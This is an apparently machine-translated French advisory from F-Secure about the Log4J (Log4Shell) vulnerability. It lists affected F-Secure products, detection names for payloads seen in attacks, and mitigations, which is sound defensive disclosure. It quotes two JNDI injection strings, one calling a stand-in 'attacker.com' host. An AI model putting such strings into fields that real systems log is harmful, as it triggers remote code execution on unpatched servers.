Une vulnérabilité dans la bibliothèque Log4J, découverte le vendredi 10 décembre, secoue les fabricants de logiciels et les fournisseurs de services du monde entier. La vulnérabilité de la méthode standardisée de traitement des messages de journal dans les logiciels de Minecraft de Microsoft vers les plates-formes de commerce électronique est déjà attaquée par des attaquants.
Il est presque impossible de décrire le niveau de risque que présentent actuellement les applications vulnérables. Si une chaîne de caractères contrôlée par l'utilisateur ciblant la vulnérabilité est consignée, la vulnérabilité peut être exécutée à distance. En termes simples, un attaquant pourrait utiliser cette vulnérabilité pour tromper le système cible afin qu'il récupère et exécute du code à distance. Dans la deuxième étape, c'est à l'attaquant de décider ce que le code malveillant doit faire.
Une "tempête presque parfaite"
Cette vulnérabilité montre à quel point il est difficile de sécuriser les logiciels d'entreprise à plusieurs niveaux. Les logiciels obsolètes, y compris les anciennes versions de Java, obligent de nombreuses entreprises à développer leurs propres correctifs ou à les empêcher de les appliquer immédiatement. Une autre complication découle du défi de corriger les capacités de journalisation de Log4j en temps réel, juste au moment où la menace d'attaques est si élevée et la journalisation est si importante.
Toutes les contre-mesures recommandées doivent être mises en œuvre « immédiatement », écrit la Cybersecurity & Infrastructure Security Agency dans un article de blog.
Les utilisateurs individuels ne peuvent pas faire grand-chose d'autre que d'installer des mises à jour de divers services en ligne dès qu'ils sont disponibles. Et cela devrait arriver immédiatement. Les entreprises et les entreprises travailleront sans relâche pour déployer des correctifs tout en sécurisant leurs propres systèmes. Après cela, il sera important de déterminer si un incident de sécurité actif est en cours dans les systèmes concernés.
Des vulnérabilités presque partout
Il peut être plus difficile de trouver une application qui n'utilise pas la bibliothèque Log4J qu'une qui le fait. Cette omniprésence signifie que les attaquants peuvent rechercher des vulnérabilités presque n'importe où.
"Veuillez changer le nom de votre Tesla ou iPhone PAS dans ${jndi:ldap://url/a} à moins que vous ne souhaitiez un événement inattendu », déclare Erka Koivunen, responsable de la sécurité des informations chez F-Secure, en plaisantant.
L'utilisation du langage de formatage de Log4J pourrait déclencher des logiciels malveillants dans les applications vulnérables. Comme nous le savons, la simple mention d'une phrase comme ${jndi:ldap://attacker.com/pwnyourserver} dans un chat Minecraft, par exemple, peut déclencher une tempête de sécurité chez Microsoft sur un système non corrigé.
Les produits F-Secure sont-ils concernés ?
F-Secure a déterminé que les produits suivants sont concernés par cette vulnérabilité :
- Gestionnaire de politiques F-Secure
- Proxy F-Secure Policy Manager
- Proxy de point de terminaison F-Secure
- Connecteur d'éléments F-Secure
Les versions Windows et Linux de ces produits sont affectées et doivent être corrigées immédiatement.
Comment puis-je patcher mon produit F-Secure ?
Nous avons développé un correctif de sécurité pour cette vulnérabilité. Des nouvelles et des mises à jour sur cette vulnérabilité sont publiées en permanence sur notre page communautaire
Quelle protection offre F-Secure contre cette vulnérabilité ?
F-Secure Endpoint Protection (EPP) est constamment mis à jour avec des détections pour les derniers fichiers d'exploitation locaux, mais étant donné les nombreuses façons dont une vulnérabilité peut être exploitée, cela ne couvre qu'une partie du problème.
Les détections EPP, comme d'habitude, traitent toute charge utile vue dans la phase de post-exploitation. Au moment d'écrire ces lignes, F-Secure a effectué les détections suivantes qui couvrent certains scénarios d'attaques graves. Ce sont des charges utiles malveillantes que nous avons observées en relation avec les exploits Log4j.
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShell.Agent.SWR
- TR/Coblat.G1
- TR/AD.MeterpreterSC.rywng
Bon nombre de ces détections sont disponibles dans F-Secure EPP depuis des mois, ce qui signifie que les clients sont protégés de manière proactive contre ces charges utiles.
D'autres détections existantes peuvent également être utiles car il existe plusieurs façons de tirer parti de l'exploit. Cette liste de détections utiles sera continuellement mise à jour au fur et à mesure de l'évolution de la situation. Voir les recommandations générales dans la section suivante pour des actions correctives supplémentaires.
En général, quelles actions devez-vous entreprendre avec n'importe quel logiciel, quel que soit le fabricant ?
- Restreindre l'accès au réseau ou le limiter aux sites de confiance. Si votre système ne peut pas se connecter à Internet pour obtenir le code malveillant, l'attaque échouera.
- Consultez régulièrement les fournisseurs pour obtenir des informations sur les correctifs et autres correctifs pour les vulnérabilités de sécurité.
- F-Secure Elements Vulnerability Management peut aider à identifier les systèmes vulnérables.
- Les produits F-Secure Elements Endpoint Protection ou F-Secure Business Suite peuvent détecter et corriger les logiciels vulnérables sur le système sur lequel ils sont installés.
F-Secure tient également tous les clients et utilisateurs informés à tout moment.
Plus sur F-Secure.com
À propos de F-Secure Personne n'a une meilleure idée des véritables cyberattaques que F-Secure. Nous comblons le fossé entre la détection et la réponse. Pour ce faire, nous tirons parti de l'expertise inégalée en matière de menaces de centaines des meilleurs consultants techniques de notre secteur, des données de millions d'appareils exécutant notre logiciel primé et des innovations continues en matière d'intelligence artificielle. Les principales banques, compagnies aériennes et entreprises font confiance à notre engagement à lutter contre les cybermenaces les plus dangereuses au monde. Parallèlement à notre réseau de partenaires de premier plan et à plus de 200 fournisseurs de services, notre mission est de fournir à tous nos clients une cybersécurité de niveau entreprise adaptée à leurs besoins. Fondée en 1988, F-Secure est cotée au NASDAQ OMX Helsinki Ltd.